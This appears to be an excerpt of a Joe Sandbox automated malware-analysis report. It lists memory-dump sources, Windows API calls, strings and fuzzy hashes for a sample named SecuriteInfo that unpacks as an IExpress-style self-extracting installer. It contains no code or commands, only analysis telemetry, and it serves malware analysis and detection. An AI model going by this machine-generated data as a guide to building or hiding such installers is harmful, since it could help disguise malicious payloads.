                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                • String ID: horseradish
                                • API String ID: 3785188418-3539543709
                                • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                • Instruction ID: de69e3e0db7e1b1098e8b21e379e90f2729b9f2eae23ec64320ca2fb6a7b9eb3
                                • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                • Instruction Fuzzy Hash: 3631F03590CE4386F6106B24B4282B5EB52BB8AB71FD69231D91E02395EF3CE04DDA20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                • String ID:
                                • API String ID: 2168512254-0
                                • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                • Instruction ID: 45d6197ceea2546ce5130d7562a9ec715b9b8ebd2737c7ac58d3cfb6bc5ff13c
                                • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                • Instruction Fuzzy Hash: 86514372608E42CAF7109F21F4681B9BBA5FB4DBA8F825235DA0D53758EF38D448DB10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                • String ID: Control Panel\Desktop\ResourceLocale
                                • API String ID: 3346862599-1109908249
                                • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                • Instruction ID: 1c2e4e626bd6e31daa0f3c6e689930f11a62ca8c5173b9206357e695b24d671d
                                • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                • Instruction Fuzzy Hash: D4516232A0CE528AFB10AB64F458179B7A2FB88B64F864531DA5D03794EF3CE548DF10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                • String ID:
                                • API String ID: 1051330783-0
                                • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                • Instruction ID: cf4e85f9d85f5c0b248b69842ce23e4222a57793ee9345b2cc81c467f11cab7c
                                • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                • Instruction Fuzzy Hash: 1351B432A0CE538AFA149F15A4581F8B7A5FB48BB4F865131CE1D63754EF38E449DB20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                • String ID:
                                • API String ID: 975904313-0
                                • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                • Instruction ID: 69bc881a7f3fcf2279e7eb8761f2c4017b59a8ba65f09c03835e22123a8c180a
                                • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                • Instruction Fuzzy Hash: 8B51C911A0CEC745FB216F24B4683F8EB91AB4ABB0F894171CA5E07785DF3CD4499B20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Window$CapsDeviceRect$Release
                                • String ID:
                                • API String ID: 2212493051-0
                                • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                • Instruction ID: d255df02d64185e198a6fa6fb141c45baa988de98984eb7ae18318750184bc14
                                • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                • Instruction Fuzzy Hash: 8C318F32B18D428AF7109B65E8185ADBBA1F74DB69F895130DE0A53B04DF3CE4498B10
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D3F95
                                • LocalFree.KERNEL32 ref: 00007FF71D1D4018
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                  • Part of subcall function 00007FF71D1D7700: GetLastError.KERNEL32 ref: 00007FF71D1D7704
                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D403E
                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D409F
                                  • Part of subcall function 00007FF71D1D7AC8: FindResourceA.KERNEL32 ref: 00007FF71D1D7AF2
                                  • Part of subcall function 00007FF71D1D7AC8: LoadResource.KERNEL32 ref: 00007FF71D1D7B09
                                  • Part of subcall function 00007FF71D1D7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF71D1D7B3F
                                  • Part of subcall function 00007FF71D1D7AC8: FreeResource.KERNEL32 ref: 00007FF71D1D7B51
                                • LocalFree.KERNEL32 ref: 00007FF71D1D4078
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                • String ID: <None>$LICENSE
                                • API String ID: 2414642746-383193767
                                • Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                • Instruction ID: 90142447e2a394faff7ea9a8e4ff9acb982303d86ce8dcfe7c9f5ea76162dca3
                                • Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                • Instruction Fuzzy Hash: 85313A31A5DE0386FB10AB64F4297BAA761FB85765FC28135D90D06694FF7DE008AF20
                                APIs
                                  • Part of subcall function 00007FF71D1D114C: _vsnprintf.MSVCRT ref: 00007FF71D1D1189
                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7763
                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7772
                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D77B8
                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D77EC
                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7805
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                • String ID: UPDFILE%lu
                                • API String ID: 2922116661-2329316264
                                • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                • Instruction ID: dc5c7bd4e6e94360f7df5edefd737de6303be90ee9015c060cdbab06efcf4585
                                • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                • Instruction Fuzzy Hash: BD31363160CE8286FB10AB25B414179F761FB89B60F964635DA5E07794DF3CE449DB10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                • String ID:
                                • API String ID: 3370778649-0
                                • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                • Instruction ID: 6c879a1355f1078cc8a7092f108482827ab82e382fb430da7bbd8bd4cdfc18a9
                                • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                • Instruction Fuzzy Hash: 6B114D6170CF4287FB146B62B468179FAA2EB4EFE1B8A9134DD0E43754EF3CD4489A10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                • String ID: wininit.ini
                                • API String ID: 3273605193-4206010578
                                • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                • Instruction ID: 142a5721326b00c911e6bafae6a9185b54f9a3cb872963199a2397a4baadfd5a
                                • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                • Instruction Fuzzy Hash: 6E110632608E4287E710AB25F8582E9B7A2FBCD725FC64131DA5E43658EF3CD549DE10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Window$Text$DesktopDialogForegroundItem
                                • String ID: horseradish
                                • API String ID: 761066910-3539543709
                                • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                • Instruction ID: cf23b1006f0354397c6c789e0fdd1cd1d80aefc0c352fd68b861d5a6e01aa0fe
                                • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                • Instruction Fuzzy Hash: 74111671E4CF4386F6543B55B42C278E651EB4AB61FD69231C90E16394EF3CE44CEA20
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF71D1D3388), ref: 00007FF71D1D4975
                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF71D1D3388), ref: 00007FF71D1D4A11
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                • String ID: <None>$@$FINISHMSG
                                • API String ID: 3507850446-4126004490
                                • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                • Instruction ID: b36dc10774dd3c0a2d8c788eab7530a033af5ac2bcb4c9925f636f9bc5ef208e
                                • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                • Instruction Fuzzy Hash: 65116572A4CE4387F7206B20F4757BAB751EB897A4F969134DA4E42684EF3CD0089F14
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: LibraryLoad$AttributesFile
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                • API String ID: 438848745-1955609190
                                • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                • Instruction ID: 31a3af8160a0f94ac4290ab4668c60bc7226ca4c75fd6544a681aa3aaafb1510
                                • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                • Instruction Fuzzy Hash: 86114C31A1CE8385FE21AB10E4642F9B7A1FB89724FC61231C54E02691EF3CD60DDB10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                • String ID:
                                • API String ID: 1273765764-0
                                • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                • Instruction ID: d282d6b67fe6d5b3de98273b2eb96ee580a3c7e51cfcf94dc5550b8d12a1893e
                                • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                • Instruction Fuzzy Hash: 67116321A0CE8786FA506B54B4283B9E761FB8AB74F864331C95E063D5DF3CE049DB50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                • String ID: horseradish
                                • API String ID: 2312377310-3539543709
                                • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                • Instruction ID: 0cec8ce9e7c9532b3b48047c1684bf139dd43d17b237b639e8b78f086647a89d
                                • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                • Instruction Fuzzy Hash: B4A1A731A1DD438AF760AB15B468279E6A5BB44770FD70135E90D83280EB3DE84DEF20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleWrite
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 1065093856-388467436
                                • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                • Instruction ID: 519967a1a570131c3ec5e3c77388e53a3f4f3bdda9d24f37c8c3df3671047bb1
                                • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                • Instruction Fuzzy Hash: 4731702260CE8286FB10AF50F4687AAE760FB497B4F854234DA9D47794DF7CD408DB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID:
                                • String ID: *MEMCAB
                                • API String ID: 0-3211172518
                                • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                • Instruction ID: 74ab055771dc5e2047a1452b6a4093dbabe343b595e19bd9ae56ff3de5b8c273
                                • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                • Instruction Fuzzy Hash: 69313921A0CF8785FA10AB11F46C3A9B7A1BB4A760FD64236D55C42290FF3CE449DB20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                • String ID:
                                • API String ID: 140117192-0
                                • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                • Instruction ID: acfd833a822a49c1e42937575e22100a3e9179ecce002abe5556599355e01a2c
                                • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                • Instruction Fuzzy Hash: 9B41CA75A0CF0281FA10AB58F8A8365B365FB88764F964635D98D42765EF3CE448EB20
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                • String ID:
                                • API String ID: 1214682469-0
